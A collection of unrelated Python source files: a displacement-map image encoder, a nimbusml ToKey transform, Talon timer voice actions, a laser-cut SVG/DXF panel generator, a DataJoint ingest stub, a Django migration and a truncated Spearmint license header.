    """Encode a displacement map into an image-friendly range.

    Values are expanded 10x, gamma-compressed (exponent 0.3) with their sign
    preserved, and near-zero inputs are forced to exactly 0.  With
    ``max_value == 1`` the result lies in [-1, 1]; with ``max_value == 255``
    it is remapped to uint8 [0, 255] (zero maps to 128).
    """
    EPS = 1e-3
    GAMMA = 0.3
    EXPAND = 10
    scaled = (disp_map * EXPAND).astype(np.float32)
    # Entries whose magnitude is below EPS encode exactly zero.
    near_zero = (scaled < EPS) & (scaled > -EPS)
    signs = np.sign(scaled)
    magnitude = np.power(np.abs(scaled), GAMMA).clip(0, 1)
    disp_img = magnitude * signs
    disp_img[near_zero] = 0  # range: [-1, 1]
    if max_value == 255:
        disp_img = (disp_img + 1) / 2 * 255
        disp_img = np.rint(disp_img).clip(0, 255).astype(np.uint8)
    return disp_img
def disp_demodulate(disp_img):
    """Invert disp_modulate: map a uint8 visualization back to disp values.

    Pixel values 127 and 128 both decode to exactly 0, because the true
    midpoint 127.5 is not representable in uint8.

    Args:
        disp_img: uint8 array produced by disp_modulate(..., max_value=255).
    Returns:
        float array of demodulated displacement values.
    """
    EXPAND = 10
    iGamma = 10 / 3  # inverse of the 0.3 gamma used when modulating
    assert disp_img.dtype == np.uint8
    zero_part1 = disp_img == 127
    zero_part2 = disp_img == 128
    # BUG FIX: a pixel cannot equal 127 AND 128 at once, so the original
    # `&` produced an always-empty mask; OR both midpoint values instead.
    zero_part = zero_part1 | zero_part2
    disp_img = disp_img / 127.5 - 1
    sign = np.sign(disp_img)
    disp_img[zero_part] = 0
    disp_img = np.abs(disp_img).clip(0, 1)
    disp_map = np.power(disp_img, iGamma) / EXPAND
    disp_map = disp_map * sign
    return disp_map
if __name__ == '__main__':
    # Convert every subject's 256x256 displacement UV map in the (hard-coded)
    # THUman dataset folder into a viewable JPEG under outputs/UV_maps/real.
    base_path = '/home/xuxudong/3D/data/THUman/dataset'
    folders = sorted(glob(osp.join(base_path, 'results_gyc_20181010_hsc_1_M', '*')))
    for idx, folder in enumerate(folders):
        disp_file = osp.join(folder, 'disp_uv_map_256.npy')
        out_folder = 'outputs/UV_maps/real'
        # First element of the stored array is the map itself.
        disp_map = np.load(disp_file)[0]
        disp_img = disp_modulate(disp_map, max_value=255)
        mmcv.imwrite(disp_img, osp.join(out_folder, f'{idx}.jpg'))
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
ToKey
"""
__all__ = ["ToKey"]
from sklearn.base import TransformerMixin
from ..base_transform import BaseTransform
from ..internal.core.preprocessing.tokey import ToKey as core
from ..internal.utils.utils import trace
class ToKey(core, BaseTransform, TransformerMixin):
    """
    Text transforms that can be performed on data before training
    a model.
    .. remarks::
        The ``ToKey`` transform converts a column of text to key values
        using a dictionary. This operation can be reversed by using
        :py:class:`FromKey <nimbusml.preprocessing.FromKey>` to obtain the
        orginal values.
    :param columns: a dictionary of key-value pairs, where key is the output
        column name and value is the input column name.
        * Multiple key-value pairs are allowed.
        * Input column type: numeric or string.
        * Output column type:
         `Key Type </nimbusml/concepts/types#keytype-columns>`_.
        * If the output column names are same as the input column names, then
        simply specify ``columns`` as a list of strings.
        The << operator can be used to set this value (see
        `Column Operator </nimbusml/concepts/columns>`_)
        For example
         * ToKey(columns={'out1':'input1', 'out2':'input2'})
         * ToKey() << {'out1':'input1', 'out2':'input2'}
        For more details see `Columns </nimbusml/concepts/columns>`_.
    :param max_num_terms: Maximum number of terms to keep per column when auto-
        training.
    :param term: List of terms.
    :param sort: How items should be ordered when vectorized. By default, they
        will be in the order encountered. If by value items are sorted
        according to their default comparison, for example, text sorting will
        be case sensitive (for example, 'A' then 'Z' then 'a').
    :param text_key_values: Whether key value metadata should be text,
        regardless of the actual input type.
    :param params: Additional arguments sent to compute engine.
    .. seealso::
        :py:class:`FromKey <nimbusml.preprocessing.FromKey>`,
        :py:class:`OneHotHashVectorizer
        <nimbusml.feature_extraction.categorical.OneHotHashVectorizer>`,
        :py:class:`OneHotVectorizer
        <nimbusml.feature_extraction.categorical.OneHotVectorizer>`,
        :py:class:`NGramFeaturizer
        <nimbusml.feature_extraction.text.NGramFeaturizer>`.
    .. index:: transform, preprocessing, text
    Example:
       .. literalinclude:: /../nimbusml/examples/ToKey.py
              :language: python
    """

    @trace
    def __init__(
            self,
            max_num_terms=1000000,
            term=None,
            sort='Occurrence',
            text_key_values=False,
            columns=None,
            **params):
        # Route the column mapping through params so both BaseTransform and
        # the core implementation receive it.
        if columns:
            params['columns'] = columns
        BaseTransform.__init__(self, **params)
        core.__init__(
            self,
            max_num_terms=max_num_terms,
            term=term,
            sort=sort,
            text_key_values=text_key_values,
            **params)
        self._columns = columns

    def get_params(self, deep=False):
        """
        Get the parameters for this operator.
        """
        # Parameter reporting is delegated entirely to the core transform.
        return core.get_params(self)
|
from talon import Context, Module
mod = Module()
ctx = Context()
# Context is only active on Linux when the user.timer_manager tag is set.
ctx.matches = r"""
os: linux
tag: user.timer_manager
"""
# systemd is already in service_manager
# mod.tag("systemd", desc="systemd management")
mod.tag("timer_manager", desc="generic timer manager support")
# Fixed duplicated word in the description ("timer timer").
mod.tag("cron", desc="non-systemd timer")
@mod.action_class
class Actions:
    """Voice-command actions for controlling system-wide and per-user timers."""
    # System-wide timer control
    def timer():
        """Run the default timer manager"""

    def timer_status():
        """Show the timer status"""

    def timer_stop():
        """Stop a timer"""

    def timer_start():
        """Start a timer"""

    def timer_disable():
        """Disable a timer"""

    def timer_enable():
        """Enable a timer"""

    def timer_reload():
        """Reload a timer"""

    def timer_restart():
        """Restart a timer"""

    def timer_help():
        """Service manager help"""

    def timer_kill():
        """Kill a timer"""

    def timer_is_enabled():
        """List if a timer is enabled"""

    def timer_status_by_name(name: str):
        """List a timers status by name"""

    def timer_stop_by_name(name: str):
        """Stop a timer by name"""

    def timer_start_by_name(name: str):
        """Start to timer by name"""

    def timer_enable_by_name(name: str):
        """Enable a timer by name"""

    def timer_disable_by_name(name: str):
        """Disable a timer by name"""

    # User timers vs system-wide timers
    def timer_user():
        """Run the default timer manager"""

    def timer_user_status():
        """Show the timer status"""

    def timer_user_stop():
        """Stop a timer"""

    def timer_user_start():
        """Start a timer"""

    def timer_user_disable():
        """Disable a timer"""

    def timer_user_enable():
        """Enable a timer"""

    def timer_user_reload():
        """Reload a timer"""

    def timer_user_restart():
        """Restart a timer"""

    def timer_user_help():
        """Service manager help"""

    def timer_user_kill():
        """Kill a timer"""

    def timer_user_is_enabled():
        """List if a timer is enabled"""

    def timer_user_status_by_name(name: str):
        """List a timers status by name"""

    def timer_user_stop_by_name(name: str):
        """Stop a timer by name"""

    def timer_user_start_by_name(name: str):
        """Start to timer by name"""

    def timer_user_enable_by_name(name: str):
        """Enable a timer by name"""

    def timer_user_disable_by_name(name: str):
        """Disable a timer by name"""
|
import ezdxf
import svgwrite
import numpy as np
# https://www.desmos.com/calculator/rtkn6udxmy
# r=-\ 0.0\cdot\cos\left(2\cdot\theta\right)\ -\ \ 0.02\cdot\cos\left(4\cdot\theta\ \right)\ \ +\ 0.0\ \cos\ \left(6\cdot\theta\right)\ +\ 0.1\cos\left(8\cdot\left(\theta\right)\right)\ +\frac{5}{\left|\cos\left(\theta+\frac{\pi}{4}\right)\right|\ +\ \left|\sin\left(\theta+\frac{\pi}{4}\right)\right|}
# r=-\ 0.0\cdot\cos\left(2\cdot\theta\right)\ -\ \ 0.02\cdot\cos\left(4\cdot\theta\ \right)\ \ +\ 0.0\ \cos\ \left(6\cdot\theta\right)\ +\ 0.1\cos\left(8\cdot\left(\theta\right)\right)\ +\frac{5}{\left|\cos\left(\theta+\frac{\pi}{4}\right)\right|\ +\ \left|\sin\left(\theta+\frac{\pi}{4}\right)\right|}
# r\ =5-\cos\left(\theta\cdot2\right)\cdot0.5-0.3\cdot\cos\left(\theta\cdot4\right)+0.1\cdot\cos\left(6\theta\right)
def init_files():
    """Create the output SVG drawing (1500x1500 viewBox) and a new R2000 DXF
    document; return them as (svg_file, dxf_file)."""
    svg = svgwrite.Drawing('svgwrite-example.svg', profile='tiny', viewBox=('0 0 1500 1500'))
    dxf = ezdxf.new('R2000')
    return svg, dxf
def polar_func_square(alfa):
    """Rounded-square contour in polar form; returns the (x, y) point at
    angle ``alfa``."""
    quarter_turn = alfa + np.pi / 4
    denom = abs(np.cos(quarter_turn)) + abs(np.sin(quarter_turn))
    radius = np.sqrt(2.0) / denom
    return np.cos(alfa) * radius, np.sin(alfa) * radius
# def polar_func_square_with_ears(alfa):
#
# s2s2 = np.sqrt(2.0)
# R = s2s2 / (abs(np.cos(alfa + np.pi / 4)) + abs(np.sin(alfa + np.pi / 4)))
#
# if alfa > np.pi * 0.72 and alfa < np.pi * 0.80:
# R = R * 0.85
#
# if alfa > np.pi * 1.15 and alfa < np.pi * 1.25:
# R = R * 0.85
#
# return np.cos(alfa) * R, np.sin(alfa) * R
def polar_circle(alfa):
    # Unit circle: return the (x, y) point at angle alfa.
    return np.cos(alfa), np.sin(alfa)
def polar_func_device_shape(alfa):
    """Device outline: rounded square plus a small 14-lobe cosine ripple."""
    quarter_turn = alfa + np.pi / 4
    base = np.sqrt(2.0) / (abs(np.cos(quarter_turn)) + abs(np.sin(quarter_turn)))
    radius = base + 0.01 * np.cos(14 * alfa)
    return np.cos(alfa) * radius, np.sin(alfa) * radius
def polar_func_device_3hole(alfa):
    """Square-ish contour with 4-, 12- and 10-lobe ripples, scaled by 1/3.68."""
    quarter_turn = alfa + np.pi / 4
    radius = 5 / (abs(np.cos(quarter_turn)) + abs(np.sin(quarter_turn))) - 0.025 * np.cos(4 * alfa) + 0.25 * np.cos(12 * alfa) + 0.1 * np.cos(10 * alfa)
    radius = radius / 3.68
    return np.cos(alfa) * radius, np.sin(alfa) * radius
def polar_func_lamp(alfa):
    """Lamp-hole contour: low-order cosine harmonics, normalized by 5."""
    radius = 5 - 0.5 * np.cos(2 * alfa) - 0.3 * np.cos(4 * alfa) + 0.1 * np.cos(6 * alfa)
    radius = radius / 5
    x = np.cos(alfa) * radius
    y = np.sin(alfa) * radius
    return x, y
def polar_func_lamp_b(alfa):
    """Square-ish lamp contour with 6- and 8-lobe ripples, scaled by 0.276."""
    quarter_turn = alfa + np.pi / 4
    radius = 5 / (abs(np.cos(quarter_turn)) + abs(np.sin(quarter_turn))) - 0.04 * np.cos(6 * alfa) + 0.05 * np.cos(8 * alfa)
    radius = radius * 0.276
    x = np.cos(alfa) * radius
    y = np.sin(alfa) * radius
    return x, y
def draw_fig_half_with_internal(N_of_points, x0, y0, R, kx, ky, polar_func, R_i, kx_i, ky_i, polar_func_int, alfa_shift_a):
    """Sample a half (pi-span) outer polar curve, then a reversed half inner
    curve, and close the contour back to the first point.

    Returns (points, points_np, L): a list of (x, y) tuples, the same data as
    a flat float32 array [x0, y0, x1, y1, ...], and the summed segment length.
    NOTE: because of the ``i > 0`` guards, L omits the two joining segments
    (outer-end -> inner-start and inner-end -> closing point).
    """
    points = []
    points_np = np.zeros((N_of_points * 4 + 6), dtype=np.float32)
    L = 0
    x = 0
    y = 0
    # Outer half: angles from alfa_shift_a over pi radians.
    for i in range(N_of_points + 1):
        alfa = alfa_shift_a + i / N_of_points * np.pi
        x_prev = x
        y_prev = y
        x, y = polar_func(alfa)
        # Quantize coordinates to 0.01 steps (truncation, not rounding).
        x = int(kx * R * x * 100) / 100 + x0
        y = int(ky * R * y * 100) / 100 + y0
        if i > 0:
            L += np.sqrt((x - x_prev) * (x - x_prev) + (y - y_prev) * (y - y_prev))
        else:
            # Remember the first point so the contour can be closed at the end.
            x_first = x
            y_first = y
        points_np[i * 2] = x
        points_np[i * 2 + 1] = y
        points.append((x, y))
    # internal part
    # Inner half traversed in reverse angle order so the combined outline
    # forms one closed loop.
    for i in range(N_of_points + 1):
        alfa = alfa_shift_a + (N_of_points - i) / N_of_points * np.pi
        x_prev = x
        y_prev = y
        x, y = polar_func_int(alfa)
        x = int(kx_i * R_i * x * 100) / 100 + x0
        y = int(ky_i * R_i * y * 100) / 100 + y0
        if i > 0:
            L += np.sqrt((x - x_prev) * (x - x_prev) + (y - y_prev) * (y - y_prev))
        points_np[N_of_points * 2 + 2 + i * 2] = x
        points_np[N_of_points * 2 + 3 + i * 2] = y
        points.append((x, y))
    # Close the contour back to the very first outer point.
    points_np[N_of_points * 4 + 4] = x_first
    points_np[N_of_points * 4 + 5] = y_first
    points.append((x_first, y_first))
    return points, points_np, L
def draw_figure(N_of_points, x0, y0, R, kx, ky, polar_func):
    """Sample a closed polar curve over a full turn.

    Returns (points, points_np, L): a list of (x, y) tuples, the same data as
    a flat float32 array [x0, y0, x1, y1, ...], and the summed perimeter of
    the sampled segments.  Coordinates are truncated to 0.01 steps.
    """
    points = []
    flat = np.zeros((N_of_points * 2 + 2), dtype=np.float32)
    perimeter = 0
    px = 0
    py = 0
    for idx in range(N_of_points + 1):
        angle = idx / N_of_points * 2 * np.pi
        prev_x, prev_y = px, py
        ux, uy = polar_func(angle)
        px = int(kx * R * ux * 100) / 100 + x0
        py = int(ky * R * uy * 100) / 100 + y0
        if idx > 0:
            perimeter += np.sqrt((px - prev_x) * (px - prev_x) + (py - prev_y) * (py - prev_y))
        flat[idx * 2] = px
        flat[idx * 2 + 1] = py
        points.append((px, py))
    return points, flat, perimeter
def build_svg_path(points):
    """Convert a flat [x0, y0, x1, y1, ...] array into an SVG path string.

    The first point gets an 'M ' (move-to) command, the rest 'L ' (line-to).
    Segments are concatenated without a separator, matching the original
    output format exactly.
    """
    n_pts = int(points.shape[0] / 2)
    segments = []
    for idx in range(n_pts):
        command = 'M ' if idx == 0 else 'L '
        segments.append(command + str(points[idx * 2]) + ' ' + str(points[idx * 2 + 1]))
    return ''.join(segments)
def add_path(svg_file, dxf_msp, points, points_np):
    """Add one polyline to the DXF modelspace and the equivalent thin black
    path to the SVG drawing."""
    dxf_msp.add_lwpolyline(points)
    path_spec = build_svg_path(points_np)
    svg_element = svg_file.path(d=path_spec, stroke="#000", fill="none", stroke_width=0.1)
    svg_file.add(svg_element)
def panel(svg_file, msp, L, Center_X, Center_Y, outline):
    """Draw one front panel: the device outline, an optional board outline,
    and a 3x3 grid of 3x3 cell blocks with lamp- or square-shaped cutouts.

    Returns the accumulated path length (input L plus everything drawn).
    """
    # Device shape
    points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=380, ky=372, polar_func=polar_func_device_shape)
    L += dl
    add_path(svg_file, msp, points, points_np)
    # # Board outline
    if outline == 1:
        points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=342, ky=327.4, polar_func=polar_func_square)
        L += dl
        add_path(svg_file, msp, points, points_np)
    # Grid geometry: blocks of 3x3 cells, each cell 36 x 36.4 units.
    B3_X_step = 36 * 3
    B3_Y_step = 36.4 * 3
    X_step = 36
    Y_step = 36.4
    for i in range(3):
        for j in range(3):
            # Encode the (i, j) block position as a two-digit id for dispatch.
            ij = i * 10 + j
            if ij == 0 or ij == 11 or ij == 22:
                # Diagonal blocks: 3x3 grid of lamp-shaped holes.
                for ii in range(3):
                    for jj in range(3):
                        CX = (i - 1) * B3_X_step + (ii - 1) * X_step + Center_X
                        CY = (j - 1) * B3_Y_step + (jj - 1) * Y_step + Center_Y
                        # Small hole for lamp
                        kx = 32
                        points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=kx, ky=32, polar_func=polar_func_lamp)
                        L += dl
                        add_path(svg_file, msp, points, points_np)
            if ij == 21 or ij == 12 or ij == 1 or ij == 10:
                # Edge-adjacent blocks: one large square cutout per block.
                CX = (i - 1) * B3_X_step + Center_X
                CY = (j - 1) * B3_Y_step + Center_Y
                points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=B3_X_step - 8, ky=B3_Y_step - 4, polar_func=polar_func_square)
                L += dl
                add_path(svg_file, msp, points, points_np)
            if ij == 2 or ij == 20:
                # Remaining corner blocks: 3x3 grid of small square holes.
                for ii in range(3):
                    for jj in range(3):
                        CX = (i - 1) * B3_X_step + (ii - 1) * X_step + Center_X
                        CY = (j - 1) * B3_Y_step + (jj - 1) * Y_step + Center_Y
                        # Small hole for lamp
                        kx = 32
                        points, points_np, dl = draw_figure(N_of_points=128, x0=CX, y0=CY, R=0.5, kx=kx, ky=32, polar_func=polar_func_square)
                        L += dl
                        add_path(svg_file, msp, points, points_np)
    return L
def angle_part_a(Center_X, Center_Y, kx_k, ky_k, svg_file, msp, ears=0):
    """Draw one corner part: a half device outline joined to a half internal
    square cutout, plus rows of mounting holes; returns the drawn length.

    kx_k / ky_k (+-1.0) mirror the part horizontally / vertically.  With
    ears=1 a narrower internal cutout (kx_i 302 instead of 342) is used and
    an extra column of radius-2 holes is added.
    """
    L = 0
    if ears == 0:
        points, points_np, dl = draw_fig_half_with_internal(N_of_points=256, x0=Center_X,
                                                            y0=Center_Y, R=0.5, kx=380 * kx_k,
                                                            ky=372 * ky_k, polar_func=polar_func_device_shape,
                                                            R_i=0.5, kx_i=342 * kx_k, ky_i=327.4 * ky_k,
                                                            polar_func_int=polar_func_square,
                                                            alfa_shift_a=np.pi / 4)
    else:
        points, points_np, dl = draw_fig_half_with_internal(N_of_points=256, x0=Center_X,
                                                            y0=Center_Y, R=0.5, kx=380 * kx_k,
                                                            ky=372 * ky_k, polar_func=polar_func_device_shape,
                                                            R_i=0.5, kx_i=302 * kx_k, ky_i=327.4 * ky_k,
                                                            polar_func_int=polar_func_square,
                                                            alfa_shift_a=np.pi / 4)
    add_path(svg_file, msp, points, points_np)
    L += dl
    # Two perpendicular rows of 7 radius-3 mounting holes, 50 units apart.
    for i in range(7):
        points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X + (i - 3) * 50, y0=Center_Y + 175 * ky_k, R=3, kx=1.0, ky=1.0, polar_func=polar_circle)
        add_path(svg_file, msp, points, points_np)
        L += dl
        points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X - 180 * kx_k, y0=Center_Y + (i - 3) * 50, R=3, kx=1.0, ky=1.0, polar_func=polar_circle)
        add_path(svg_file, msp, points, points_np)
        L += dl
    if ears == 1:
        # Extra column of radius-2 holes at fixed vertical offsets.
        yy = [40.9, 77.3, 113.7, 150.1, 186.5, 222.9, 259.3, 295.7, 31.7, 68.1, 104.5, 177.3, 213.7, 250.1, 286.5]
        for y_ in yy:
            points, points_np, dl = draw_figure(N_of_points=18, x0=Center_X - 171 + 14.859, y0=Center_Y - 163.7 + y_, R=2.0, kx=1.0, ky=1.0, polar_func=polar_circle)
            add_path(svg_file, msp, points, points_np)
            L += dl
    return L
def main():
    """Lay out the full cut sheet (two panels, rows of mirrored corner parts,
    one spare device outline), report total path length and estimated price,
    then save both the DXF and the SVG output files."""
    svg_file, dxf_file = init_files()
    msp = dxf_file.modelspace()
    L = 0
    # List outline
    # points, points_np, dl = draw_figure(N_of_points=256, x0=750, y0=750, R=0.5, kx=1500, ky=1500, polar_func=polar_func_square)
    # add_path(svg_file, msp, points, points_np)
    dl = panel(svg_file, msp, L, Center_X=220, Center_Y=220, outline=0)
    L += dl
    dl = panel(svg_file, msp, L, Center_X=220, Center_Y=650, outline=1)
    L += dl
    # Diagonal stacks of corner parts, mirrored via kx_k / ky_k signs.
    for i in range(18):
        Center_X = 610 + i * 30
        Center_Y = 200 + i * 30
        dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=-1.0, svg_file=svg_file, msp=msp)
        L += dl
    for i in range(4):
        Center_X = 610 + 18 * 30 + i * 50
        Center_Y = 200 + 18 * 30 + i * 50
        dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=-1.0, svg_file=svg_file, msp=msp, ears=1)
        L += dl
    for i in range(6):
        Center_X = 1300 - i * 30
        Center_Y = 200 + i * 30
        dl = angle_part_a(Center_X, Center_Y, kx_k=-1.0, ky_k=-1.0, svg_file=svg_file, msp=msp)
        L += dl
    for i in range(6):
        Center_X = 610 + i * 30
        Center_Y = 900 - i * 30
        dl = angle_part_a(Center_X, Center_Y, kx_k=1.0, ky_k=1.0, svg_file=svg_file, msp=msp, ears=0)
        L += dl
    for i in range(8):
        Center_X = 1000 + i * 30
        Center_Y = 1000 + i * 30
        dl = angle_part_a(Center_X, Center_Y, kx_k=-1.0, ky_k=1.0, svg_file=svg_file, msp=msp, ears=0)
        L += dl
    # My local laser cut service costs me ~1 USD per meter of length (plywood 10mm)
    # fanera3d.ru
    # One spare device outline without internal cutouts.
    Center_X = 220
    Center_Y = 1050
    points, points_np, dl = draw_figure(N_of_points=256, x0=Center_X, y0=Center_Y, R=0.5, kx=380, ky=372, polar_func=polar_func_device_shape)
    L += dl
    add_path(svg_file, msp, points, points_np)
    print('L = ', L)
    # Price estimate at 32 per meter (presumably L is in mm — see note above).
    M = int((L * 32) / 1000)
    print('Rub = ', M)
    dxf_file.saveas("lwpolyline1.dxf")
    svg_file.save()
|
import os
import pathlib
import datajoint as dj
import element_data_loader.utils #github.com/datajoint/element-data-loader
from adamacs import db_prefix, session, behavior
import scipy.io as spio
import numpy as np
# All ingest tables below live in the '<db_prefix>behavior_ingest' schema.
schema = dj.schema(db_prefix + 'behavior_ingest')
@schema
class BehaviorIngest(dj.Imported):
    """Per-recording ingest: load a Bpod .mat file and insert its trial data
    into behavior.Trial and behavior.Event."""

    definition = """
    -> session.Recording
    """

    def make(self, key):  # reading bpod data to populate
        # could model dir navigation after element_array_ephys
        # which uses config file for root dir and csv for relative paths
        # https://github.com/datajoint/workflow-array-ephys/blob/main/workflow_array_ephys/paths.py
        # NOTE(review): get_beh_root_dir, get_beh_sess_dir and find_full_path
        # are not defined or imported in this module (element_data_loader.utils
        # is only imported as a module), so make() would raise NameError as
        # written — confirm the intended helper imports.
        bpod_root_dir = pathlib.Path(get_beh_root_dir(key))
        bpod_sess_dir = pathlib.Path(get_beh_sess_dir(key))
        bpod_dir = find_full_path(bpod_root_dir, bpod_sess_dir)
        # Use the first .mat file found in the session directory.
        bpod_filepath = next(bpod_dir.glob('*.mat'))
        trial_info = load_bpod_matfile(key, bpod_filepath)
        behavior.Trial.insert(trial_info, ignore_extra_fields=True)
        behavior.Event.insert(trial_info, ignore_extra_fields=True)
# --------------------- HELPER LOADER FUNCTIONS -----------------
# see full example here:
# https://github.com/mesoscale-activity-map/map-ephys/blob/master/pipeline/ingest/behavior.py
def load_bpod_matfile(key, matlab_filepath):
    """
    Loading routine for behavioral file, bpod .mat
    """
    # Loading the file
    SessionData = spio.loadmat(matlab_filepath.as_posix(),
                               squeeze_me=True, struct_as_record=False)['SessionData']
    # NOTE(review): incomplete stub — trial_info is never built and the
    # return below is commented out, so this currently returns None while
    # BehaviorIngest.make expects insertable trial rows; finish before use.
    # Add to dict for insertion. For example:
    # for trial in range(SessionData.nTrials):
    #     trial_info['start_time'] = SessionData.RawData.OriginalEventTimestamps[trial]
    # return trial_info
# Generated by Django 2.1.7 on 2020-01-17 09:51
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # NOTE(review): the `default=datetime.datetime(2020, 1, 17, ...)` below is the
    # wall-clock moment `makemigrations` was run, frozen into the schema default.
    # This is the usual artifact of declaring `default=timezone.now()` (called)
    # instead of `default=timezone.now` (callable) on the model field -- worth
    # confirming on the ContestAnnouncement model. Do not edit an already-applied
    # migration; fix the model and generate a new migration instead.

    dependencies = [
        ('contest', '0005_contestannouncement_update_time'),
    ]
    operations = [
        migrations.AlterField(
            model_name='contestannouncement',
            name='update_time',
            field=models.DateTimeField(default=datetime.datetime(2020, 1, 17, 9, 51, 23, 355977, tzinfo=utc)),
        ),
    ]
|
# -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: [email protected]
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
